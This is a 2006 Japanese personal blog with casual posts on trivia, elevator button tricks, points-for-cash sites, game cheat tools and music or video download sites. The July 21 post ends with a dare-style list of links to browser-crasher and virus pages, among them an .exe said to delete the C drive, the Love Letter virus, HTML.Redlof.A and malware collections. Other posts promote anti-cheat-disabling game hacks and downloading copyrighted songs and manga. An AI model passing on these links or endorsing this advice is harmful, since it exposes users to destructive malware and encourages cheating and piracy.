鯖転移ー 

July 26 [Wed], 2006, 11:19
転移しましたw
訳あってサーバー転移w

ヽ(´Д`)人(´Д`)人(´Д`)人(´Д`)ノあぁ 

July 25 [Tue], 2006, 23:08
7月中は更新しない予定だったんだけどねぇ
軽く更新

( ゚∀゚)ノィョ―ゥ
今回は適当におまけみないなのを紹介していくお(´・ω・`)
「てか。もう・・朝起きんのしんどい_| ̄|○」
とか言う人はお勧めかも(ぁ
自分はAは、まずありえないんで(´・ω・`)b

詳細

〜その他〜
遊戯王カード世界累計158億枚以上ギネス申請(7/21)
とうとうここまで来たのか・・・( ´,_ゝ`)プッ
世界一だとよゝ( ゚∀゚)メ(゚∀゚ )ノ アヒャヒャヒャ

好きな100円アイスランキング
自分は「爽」か「モナ王」ですかねぇ・・・
ロッテてか・・・w
一位が「雪見だいふく」とは・・・wwww量少なッwwww・・・
同じ100円なら用量重視ですよッと・・・・


Clay Pigeons
お次はゲームですよっと・・・
「z」「x」で遊べますよっと・・・

おすぎ「『ゲド戦記』ゴミみたい
テメェのほうがゴ・・・ブフッ∵(´ε(○=(゚∀゚ )

ちと遅かったかなw
極楽とんぼ 山本さん。吉本解雇w

ニュースの模様・・
オイオイ・・・毎週、メチャイケの「油谷さん」チェックしてたのによぉ・・・・(;゚д゚)
パ・・ぱ・・パラシュ・・・タ・・・・_| ̄|○

RMT 

July 21 [Fri], 2006, 16:40
夏休みとつnyブフッ∵(´ε(○=(゚∀゚ )う!
暇何でまたまた更新( ゚∀゚)
それがですねぇ。。。ネタが多くて多くて・・・・(*´∀`)アハハ
多分これが7月最後の更新かもn。・゚・(Д`(⊂(゚Д゚ つ⌒
てか、実は昨日・・・・誕生日だったりします。
↑のはスルーで(´・ω・`)b

で、そのネタみたいなのが、えっと・・・何だっけ?・・・・w
RMTです。
はい。はい。また、ゲームネタです。はい。
で、そのRMT(「リアル・マネー・トレーディング」の略)
例えば、
メイプルストーリー内の仮想通貨100万メル(10Mと以下略)を1000円で販売とか
レッドストーンとかコルムとか・・・・
値段はそのゲーム内(サーバー)の相場によって値段が変わります。
売ってるサイトによっては、10M、100Mとあるようです。

WebMonyでも購入可能なサイトもあります。
※RMTは犯罪です。何があっても自己責任で

おまけ
ブラクラ、ウイルスサイト 勇気があるなら開けるよw
PC逝かれても知らないヨンw ガン( ゚д゚)ガレ

http://www.hellplant.org/cgi-bin/xoor/serpent.cgi
telnetストーム、ニュースストーム等
http://211.10.20.71/std.cgi?id=kuroi&pn=05
windowオープン1
FDアタック12
ディスクアタック12
無限ループ12
http://www2.strangeworld.org/
http://www2.strangeworld.org/uedakana/
http:/www2.strangeworld.org/uedakana/sahraxxxx.jpg
mailtoストーム
FDD大量さらにcon/conやtelnetもやってます。
VBではHTML_SUAR_Aとして検出。
http://easyweb.easynet.co.uk/~hiros/virii99/newtype/LOVE.zp
ラブレターウイルス
http://www.angelfire.com/sd2/voyage/images/list01.exe
実行するとCドライブシステムが削除
http://technotrade.50megs.com/kok_website/kok_website_nbci/FINAL_DOCUMENT_1.HTM
ウイルス HTML.Redlof.A
http://dms100.org/worksucks/lame.html
無限java
http://www.hidenomori.com/kiken1.html
mailtoストーム
http://el-killer.chez.tiscali.fr/Virii.htm
DOWNLOAD VIRII
http://www.monostv.terra.cl/
Virii Collection
http://www.vietatonline.com/webheritage1.html
webheritage
http://homepage2.nifty.com/superpage/opai.htm
おっぱいブラクラ

えれべーたー 

July 20 [Thu], 2006, 11:49
時間があったので軽く更新。

何かエレベーターの裏技みたいな・・・・?隠しコマンド?w

【押した階数ボタンをキャンセルする】

・三菱
キャンセルしたい[階数ボタン]をダブルクリック
キャンセルしたい[階数ボタン]を押し続ける

・フジテック
キャンセルしたい[階数ボタン]を5連打

・OTIS
扉が開いているときに[開ボタン]を押したまま、キャンセルしたい[階
数ボタン]をダブルクリック

・松下
キャンセルしたい[階数ボタン]をダブルクリック

・東芝
キャンセルしたい[階数ボタン]をダブルクリック

・日立
キャンセルしたい[階数ボタン]を押し続ける(3〜5秒)

・不明
キャンセルしたい[階数ボタン]を押し続ける
[階数ボタン]すべてを押す
最上階層から順に素早くすべての[階数ボタン]を押す


【停止不可の階に停止する】

・フジテック
[開ボタン] + [閉ボタン] + 目的の[階数ボタン]


【上下方向をキャンセルする】

・日立
乗り込んだ[階数ボタン]をダブルクリック(他階から呼び出しが無い
場合、キャンセル有効)

GETMONEY 

July 17 [Mon], 2006, 16:00
ふぅ・・・久しぶりに更新・・・。・゚・(Д`(⊂(゚Д゚ つ⌒
なんかもうグタグタで_| ̄|○
とまぁおいといて

前の記事で紹介したような内容かな
えっと・・・そう、GETMONEYですわw
メルマガとか資料請求とか登録しまくって、ポイントをじゃんじゃん貯めるサイトみたいですw
現在、1185円。WEBMONEYとか郵便貯金とか出来るんで、簡単に引き換えれる( ・∀・)
WEBMONEYならメイプルとかMMORPGやってる人にはいいかもねw

で、その例のサイト

現にこのサイトで5万、10万、15万稼いだ人もいるかとか、、、、
ぬるぽ伝説
↑のサイトを参考にがんばってみては?w

完成(゚∀゚ ) 

June 21 [Wed], 2006, 17:42
ついに完成したよんヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノ
なにがってヽ(ヽ・∀・)?
ホームページ
だよ

名前?ネーヨ( ´,_ゝ`)プッ

( ;´・ω・`)人(´・ω・`; ) 

June 01 [Thu], 2006, 18:39
とりあいず、リクエスト・・・なのか?があったので更新しときます( ;谷)

ネットで出来る小遣いだっけ?

「そんなもん在る訳ねぇだろ。ヴァカがッ!!」
とか思った人は、逝けば良いのにね( ´,_ゝ`)プッ

んまぁ実際あるんですよ( ゚ー゚)

登録する際は、まずフリーメールを使おうw
無料で2Gまで使える Gmail がありますw
Gmailは、招待状が無いと登録出来ないので招待状を配布するサイトを紹介します。。。(;´ρ`)チカレタヨ・・・

Gmail 招待状配布City

Gmail Slot
↑は改修中だそうで(;´∀`)

そして、Gmailには隠れた機能がw
「aaaaaaaaaaaa@gmail.com」というメルアドを持っているとします。
じゃぁ@の前の文字に「.」を入れても同じメールアドレスとして使うことができ、
「a.aaaaaaaaaaa@gmail.com」で懸賞サイトに登録したりしてもメールを受信できのさ( ゚∀゚)
そう、、、もうお解かりかとw
つまり、メールが長いほうが良き訳ですw

ちょびリッチ
騙されたと思ってやって見てくださいなw
即P加算のメルマガ登録しまくればポイントが溜まり、1000Pで500円分のWEBMONEYとか
色々交換出来ます。1000円分ぐらいあればアマゾンで何か購入できるかもねw

GETMONEY
こちらはキャッシュバック制ですが、実際10万、8万稼いだ方も居るとか・・・
一番お勧めかも

1YEN.TV
パワーポイントを貯めて、iPodとか豪華商品を1円で購入できます。
正直一番非効率的かも。。。(;´∀`)一日最大5PとかOTZ

フルーツメール
メールを読むだけでPが加算されます。

↑のサイトで登録しまくっても、効率悪いは時間食うはもう最悪なので
自動入力ソフトを使いましょうw
ドラッグするだけでメルアドが入力されます。

でわ(#゚Д゚)/~~

ヽ(;´Д`)ノ 

May 31 [Wed], 2006, 22:01
久しぶりの更新(;´∀`)
正直だryoaklfja
置いといて・・・

適当に更新して寝ますm9っ`Д´)
まぁいつものリンクベタベタ張って逃走しますε≡≡ヘ( ´Д`)ノ

早速、、、
自分も昔よくしてたMMORPG の、チ○トとかマ○ロとか。。。(ぇ
紹介します( ´∀`)

nProtect停止、窓化、マクロ、加速器機能があるソフトですm9(・∀・)
ネ申..._〆(゚▽゚*)
こんなソフト売っていいのかなw

インターナル から販売されるソフトです。
で、そのソフトが ゴーストリプレイ
ちなみに有料なのでb
通常6900円の所が今なら4980円ですよ!奥さん( ゚∀゚)
キイタ?( ゚д゚)オクサン(゚д゚ )アラヤダワァ

はい。次いきます
噂のNINTENDOから発売される「Wii」ですが販売価格が18000円決定・・?
詳細

でわヾ(゚ω゚)ノ゛

ヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノ 

April 30 [Sun], 2006, 9:46
オヒサ(ノ ̄∇ ̄)乂( ̄ー ̄ )ノオヒサ (殴
更新すんのメンドクセ
ん〜何週間振りかな・・・・(≧ω≦)(殴

(つ´∀`)つ

まぁ無駄に過ごしたわけじゃないけどねw
テキトーにネット上泳いでたらこんなの発見↓
千の鈴の音
なんと、音楽が・・・・

俺の音楽46
上と同じような感じ↑

YouTube
↑は動画がダウンロードできます。なんとアニメまで・・・

YouTube動画をダウンロード
ここで欲しい動画があればダウンロードできます。
ダウンロードしても拡張子が違う筈なので、各自でAVIとか何なり変換ツールでも探してくださいな。

Google Video
ここも動画がDLできるのかな・・・?しかも、Google・・・・_| ̄|〇

はい、次逝きます。。。。

THE NEO_SOKU (つ・ 3 ・)つ:テニスの王子様のミュージカルすげえwwwwwww
極ネタですb
テカ。。。ウザスw

↓はバイオハザード2してる人がビビリまくる動画。分かる人は分かる(ぇ






アンリアルゲーマー
異常なまでに少年がブチ切れます、、テラワロスwww


次の更新いつになるか分からんけど愛読してね(核爆)

バイバイ!(゚▽゚*)ノ~~


ネット上にある役立つ、便利な裏情報 

April 06 [Thu], 2006, 18:13
イヨ―ウ(=゚ω゚)ノ
いよいよクラス発表でsう(殴
(つ´∀`)つ

今回はネタが満載だょヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノ
※何が起きても自己責任でお願いします
|彡サッ
ますは、小ネタからb
ナルト  ご覧の通りNARUTOです
えとですね。このサイトでNARUTOの漫画がダウンロードが可能です。



英・・・語・・・_| ̄|〇

鋼の錬金術師
↑と同じく英語です_| ̄|〇


ジャンケン必勝法
見る価値ありッス

(つ´∀`)つおいといて

次はですね、音楽です。
皆さんもレンタルショップなんか行って、CD借りますよね。
借りるには当然お金が掛かります。
そこで、
【JPOP - MUSIC FEVER】
欲しい曲があれば。
Free Samplingの↓WMAに右クリック
「対象をファイルに保存」
で。DL完了

ほかに【dawndew's J-drama】
    
百度MP3
    [SoGua.com]
    [Souting.com]
    jmp3.net

『百度MP3』
【MP3】にあわせて、「全部音?」 にチェックを入れてください。歌手や曲名を、『日本語』でいれて、「百度検索」 をクリック!

※ こちらで落とした物には、著作権のあるものばかりです。著作権保護に十分注意してください。

今日はこのへんで
次は、エミュレーター紹介予定ッス!

さて誰でしょうかねw
|彡サッ

2006年07月
« 前の月  |  次の月 »
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31
最新コメント
アイコン画像わっか
» とても暇ですゎ(●´ω`●)ゞ (2006年02月22日)
カテゴリアーカイブ
プロフィール
  • プロフィール画像
  • アイコン画像 ニックネーム:norihito
読者になる
Yapme!一覧
読者になる